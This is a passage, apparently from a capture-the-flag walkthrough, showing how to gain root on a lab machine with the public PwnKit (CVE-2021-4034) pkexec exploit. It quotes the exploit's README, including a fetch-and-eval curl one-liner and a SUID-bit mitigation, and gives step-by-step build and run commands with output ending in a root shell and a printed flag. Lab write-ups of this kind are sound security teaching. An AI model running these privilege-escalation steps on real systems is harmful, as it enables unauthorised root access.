vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
```
Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
```
## Dry Run
To not execute a shell but just test if the system is vulnerable compile the `dry-run` target.
If the program exit printing "root" it means that your system is vulnerable to the exploit.
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ make dry-run
...
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
root
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
1
```
If your system is not vulnerable it prints an error and exit.
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ dry-run/dry-run-cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
0
```
## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One-liner commands
You can easily exploit the system using a single script, downloadable and executable with this command:
```sh
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
```
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
```
# Mitigation
If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.
```bash
# chmod 0755 /usr/bin/pkexec
```
The exploit then will fail complaining that `pkexec` must have the
setuid bit enabled.
```bash
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ sudo chmod 0755 /usr/bin/pkexec
vagrant@ubuntu-impish:/vagrant/CVE-2021-4034$ ./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root
```
[magellan@venus CVE-2021-4034-main]$
Based on the provided “README.md” instructions, here is a step-by-step guide to compile and run the CVE-2021-4034 exploit.
[magellan@venus CVE-2021-4034-main]$ ls -al
total 32
drwxr-xr-x. 3 magellan magellan 150 Jan 30 2022 .
drwx------. 7 magellan magellan 4096 May 21 23:25 ..
-rw-r--r--. 1 magellan magellan 114 Jan 30 2022 .gitignore
-rw-r--r--. 1 magellan magellan 1071 Jan 30 2022 LICENSE
-rw-r--r--. 1 magellan magellan 469 Jan 30 2022 Makefile
-rw-r--r--. 1 magellan magellan 3419 Jan 30 2022 README.md
-rw-r--r--. 1 magellan magellan 292 Jan 30 2022 cve-2021-4034.c
-rwxr-xr-x. 1 magellan magellan 305 Jan 30 2022 cve-2021-4034.sh
drwxr-xr-x. 2 magellan magellan 77 Jan 30 2022 dry-run
-rw-r--r--. 1 magellan magellan 339 Jan 30 2022 pwnkit.c
[magellan@venus CVE-2021-4034-main]$
Now, we have to compile the C code. The Make file should compile the necessary files. Run the make command. This will compile the "pwnkit.so" and cve-2021-4034 binaries.
[magellan@venus CVE-2021-4034-main]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
[magellan@venus CVE-2021-4034-main]$
After running make, you should see the compiled binaries.
[magellan@venus CVE-2021-4034-main]$ ls -al
total 84
drwxr-xr-x. 4 magellan magellan 229 May 21 23:31 .
drwx------. 7 magellan magellan 4096 May 21 23:25 ..
-rw-r--r--. 1 magellan magellan 114 Jan 30 2022 .gitignore
drwxr-xr-x. 2 magellan magellan 25 May 21 23:31 'GCONV_PATH=.'
-rw-r--r--. 1 magellan magellan 1071 Jan 30 2022 LICENSE
-rw-r--r--. 1 magellan magellan 469 Jan 30 2022 Makefile
-rw-r--r--. 1 magellan magellan 3419 Jan 30 2022 README.md
-rwxr-xr-x. 1 magellan magellan 24640 May 21 23:31 cve-2021-4034
-rw-r--r--. 1 magellan magellan 292 Jan 30 2022 cve-2021-4034.c
-rwxr-xr-x. 1 magellan magellan 305 Jan 30 2022 cve-2021-4034.sh
drwxr-xr-x. 2 magellan magellan 77 Jan 30 2022 dry-run
-rw-r--r--. 1 magellan magellan 33 May 21 23:31 gconv-modules
-rw-r--r--. 1 magellan magellan 339 Jan 30 2022 pwnkit.c
-rwxr-xr-x. 1 magellan magellan 16488 May 21 23:31 pwnkit.so
[magellan@venus CVE-2021-4034-main]$
Now, run the exploit. To execute the exploit and obtain a root shell, run the compiled cve-2021-4034 binary.
[magellan@venus CVE-2021-4034-main]$ ./cve-2021-4034
sh-5.1#
Upon running, it grants a root shell. Confirm this by running “whoami”. If it returns "root," the escalation is successful. Change the directory to root to obtain the root flag.
sh-5.1# whoami
root
sh-5.1# cd /root
sh-5.1# ls -al
total 44
dr-xr-x---. 2 root root 195 Jun 3 2021 .
dr-xr-xr-x. 17 root root 224 May 19 2021 ..
-rw-------. 1 root root 8272 Jun 3 2021 .bash_history
-rw-r--r--. 1 root root 18 Jan 28 2021 .bash_logout
-rw-r--r--. 1 root root 141 Jan 28 2021 .bash_profile
-rw-r--r--. 1 root root 429 Jan 28 2021 .bashrc
-rw-r--r--. 1 root root 100 Jan 28 2021 .cshrc
-rw-------. 1 root root 53 Jun 3 2021 .lesshst
-rw-------. 1 root root 0 May 20 2021 .python_history
-rw-r--r--. 1 root root 129 Jan 28 2021 .tcshrc
-rw-------. 1 root root 625 May 19 2021 anaconda-ks.cfg
-rw-------. 1 root root 1225 May 21 2021 root_flag.txt
sh-5.1# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Congratulations on completing Venus!!!
If you have any feedback please contact me at [email protected]
[root_flag_83588a17919eba10e20aad15081346af]
sh-5.1#
That's all for this tutorial. If you have
any doubts or queries related to this video, please write to me in the comment
section.
